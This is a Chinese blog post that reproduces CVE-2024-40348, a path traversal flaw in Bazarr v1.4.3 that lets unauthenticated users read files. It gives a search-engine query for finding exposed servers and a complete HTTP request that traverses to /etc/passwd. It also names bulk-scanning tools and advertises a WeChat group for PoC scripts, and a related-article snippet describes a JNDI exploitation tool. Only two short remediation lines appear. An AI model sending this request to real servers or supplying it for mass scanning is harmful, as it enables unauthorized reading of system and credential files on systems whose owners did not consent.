【漏洞复现】Bazaar v1.4.3 任意文件读取漏洞(CVE-2024-40348)

于 2024-07-30 10:02:07 发布
阅读量124 收藏
点赞数 4
分类专栏: 漏洞复现篇 文章标签: 文件读取 Bazaar
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140789056
版权

0x01 产品简介

Bazarr是Sonarr和Radarr的配套应用程序,可根据您的要求管理和下载字幕。

0x02 漏洞概述

Bazarr存在任意文件读取漏洞,该漏洞是由于Bazaar v1.4.3的组件/api/swaggerui/static中存在一个问题,允许未经身份验证的攻击者可利用该漏洞执行目录遍历。

0x03 搜索引擎

title="Bazarr"

在这里插入图片描述

0x04 漏洞复现

GET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本

SuperherRo
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Bazaar v1.4.3 任意文件读取漏洞复现(CVE-2024-40348)
0xSec
07-25 362
Bazarr存在任意文件读取漏洞,该漏洞是由于Bazaar v1.4.3的组件/api/swaggerui/static中存在一个问题,允许未经身份验证的攻击者可利用该漏洞执行目录遍历。
漏洞挖掘】——56、Bazaar信息泄露检测与利用
Fly_鹏程万里
10-20 230
人为失误:在使用Bazaar时开发者可能会意外将敏感信息存储在配置文件中,例如:在.bazaar/locations.conf中存储密码等配置文件Bazaar提供了一些配置文件,例如:.bazaar/locations.conf、.bzr/branch/branch.conf等,其中可能会存储敏感信息版本控制:如果将敏感信息添加到版本控制系统中,例如在代码库中存储密码、API密钥等,这些敏感信息将会被公开,从而导致信息泄露的问题。
漏洞复现Bazaar v1.4.3 任意文件读取漏洞复现(CVE-2024-40348)
qq_39894062的博客
07-26 357
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
MySQL 概率性任意密码_CVE-2012-2122: Security vulnerability in MySQL/MariaDB sql/password.c(概率性任意密码登mysql)...
weixin_39722563的博客
01-19 260
CVE-2012-2122: Security vulnerability in MySQL/MariaDB sql/password.c(概率性任意密码登mysql)horseluke (微碌) | 2012-06-11 13:20原文:http://seclists.org/oss-sec/2012/q2/493From: Sergei Golubchik Date: Sat, 9 Jun ...
MangoPi Nezha-MQ--Buildroot编译kernel,uboot,最小文件系统
似水流年
01-14 2749
文章目录环境获取代码烧写并启动系统 https://bbs.aw-ol.com/topic/911/%E9%BA%BB%E9%9B%80d1s%E5%BC%80%E5%8F%91%E6%9D%BF%E6%94%AF%E6%8C%81buildroot-%E4%B8%80%E4%BB%B6%E6%9E%84%E5%BB%BA%E4%BA%86 环境 安装软件包: sudo apt install debianutils sed make binutils build-essential gcc g++ bas
全网首家支持使用buildroot 2021构建全志RISC-V 64架构哪吒 D1开发板
韦东山嵌入式专栏
07-13 2132
文章目录项目仓库汇总编译完整系统或者各个部分构建完整系统镜像单独编译各个部分烧写启动ToDoList已实现功能未实现 计划实现如何参与此项目提交PR提交issues 项目仓库汇总 buildroot github仓库地址 https://github.com/100askTeam/neza-d1-buildroot.git opensbi gitee仓库地址 https://gitee.com/weidongshan/NezaD1-opensbi.git u-boot gitee仓库地址 https://
分布式版本管理工具-bazaar
Maooo的博客
07-27 310
Basic commands: bzr init makes this directory a versioned branch bzr branch make a copy of another branch bzr add make files or directories versioned bzr ignore ignore a file or pattern bzr mv mov...
gnuplot读取mysql数据库_Tpcc-MySQL测试并使用Gnuplot生成图表
weixin_30421223的博客
01-20 75
TPC(Tracsaction Processing Performance Council) 事务处理性能协会是一个评价大型数据库系统软硬件性能的非盈利的组织,TPC-C是TPC协会制定的,用来测试典型的复杂OLTP系统的性能。Tpcc-MySQL是percona基于tpcc衍生出来的产品,专用于mysql基准测试,其源码放在bazaar上,因此需要先安装bazaar客户端。项目地址:https...
GNU/Linux - Bazaar版本管理工具
guoqx的专栏
07-24 481
根据 Jelmer Vernooij 的说法,Canonical 的 Bazaar 团队的成员在 2012 年初被分配到不同的任务,他本人在7年来为该项目做出贡献后,于2012年底停止了对 Bazaar 的贡献。同样,Bugzilla项目在2014 3月从 Bazaar 改为使用 git,其中一个原因是 Bazaar 几乎已被放弃的印象:“每个月可能有 2-3 次向主干提交。并用来进行Ubuntu项目的版本控制。Bazaar 可以由一个开发本地内容的多个分支的开发人员使用,也可以由跨网络协作的团队使用。
haskell-bazaar:探索haskell和函数式编程概念
02-04
发展历程设置Docker机密转到./secrets文件夹,并根据提供的模板定义以下文件psql-db :postgres数据库的名称psql-password :postgres数据库的密码psql-user :postgres数据库的用户mailchimp-api-key :Mailchimp ...
malware-bazaar:恶意软件集市的Python脚本
04-14
恶意软件集市 恶意软件集市的Python脚本 MalwareBazaar是一个由abuse.ch运营的项目。 该项目的目的是收集和共享恶意软件样本,以帮助IT安全研究人员和威胁分析人员保护其选区和客户免受网络威胁。...
Meld-3.22.0-win32 文件及目录比较工具 windows版
10-27
Meld是一款免费开源的可视化的文件及目录对比(diff) / 合并 (merge) 工具,通过它你可以对两个或三个文件/目录进行对比,同时还提供编辑及合并功能,另外还支持 CVS, Subversion, Bazaar-ng 和 Mercurial 等版本...
Property-Baazar
04-29
1.1项目属性Bazaar简介任何管理者的任务之一就是以组织可以实现其目标的方式来计划和控制组织。 与人的福祉相关的问题(如住所)和其他问题对于组织中的决策非常重要。 借助房地产市场,这些问题将很容易解决。 该...
python-vcs-repo-mgr:版本控制存储库管理器
02-05
3. **Bazaar (Bzr)**:Bazaar 是Canonical公司开发的版本控制系统,它强调的是易用性和灵活性,适合个人和团队协作。 **二、RepoMgr的核心功能** 1. **创建和克隆仓库**:RepoMgr 可以轻松创建新的VCS仓库或从远程...
JNDIExploit使用
07-29
一款用于 JNDI注入利用的工具,大量参考/引用了 Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用 java -jar JNDIExploit.jar -h查看参数说明,其中 --ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false) -h, --help Show this help Dockerfile git clone https://github.com/feihong-cs/JNDIExploit.git cd ./JN
基于MATLAB的人体行为识别.zip
最新发布
07-29
在MATLAB中,可以使用机器学习和计算机视觉技术来实现人体行为识别。下面是一个基本的人体行为识别过程的程序: 1. 数据收集和准备: - 收集包含不同人体行为的视频数据。 - 使用视频处理技术提取每个视频中的人体姿势和关键点信息。 2. 特征提取: - 使用计算机视觉技术,如OpenPose或者其他姿势估计算法,提取每个视频中的人体关键点位置。 - 根据关键点位置计算特征向量,例如关节角度、运动速度等。 3. 数据标记和标签: - 根据人体行为类型,对收集的数据进行标记和分类,例如步行、跑步、打球等。 - 为每个人体行为类型分配一个标签。 4. 训练模型: - 使用机器学习算法,如支持向量机(SVM)、决策树、深度神经网络等,对标记和分类的数据进行训练。 - 使用训练数据和标签训练模型,以学习不同行为类型之间的关系。 5. 测试和识别: - 使用训练好的模型对新的测试数据进行预测和识别。 - 输入测试数据的特征向量到训练好的模型中,根据模型的输出来确定人体行为类型。 6. 评估和改进: - 根据测试结果评估
【创新未发表】Matlab实现蝗虫优化算法GOA-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【SCI一区】Matlab实现向量加权平均算法INFO-CNN-LSTM-Attention的风电功率预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值